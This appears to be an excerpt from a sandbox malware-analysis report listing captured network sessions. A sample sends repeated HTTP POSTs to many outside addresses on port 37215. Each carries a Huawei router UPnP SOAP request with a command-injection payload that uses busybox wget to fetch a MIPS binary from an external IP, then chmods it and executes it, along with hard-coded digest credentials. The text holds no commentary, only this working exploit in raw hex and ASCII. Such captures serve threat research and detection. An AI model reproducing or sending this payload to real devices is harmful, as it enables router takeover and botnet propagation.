[TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.594089985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.201972008 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.417900085 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      125192.168.2.1455710197.71.225.18837215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:07.056807995 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.594058037 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      126192.168.2.144167641.57.56.8537215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:07.057852030 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.594089985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.201972008 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.417900085 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      127192.168.2.1452580156.128.209.12337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:07.059134007 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.594028950 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 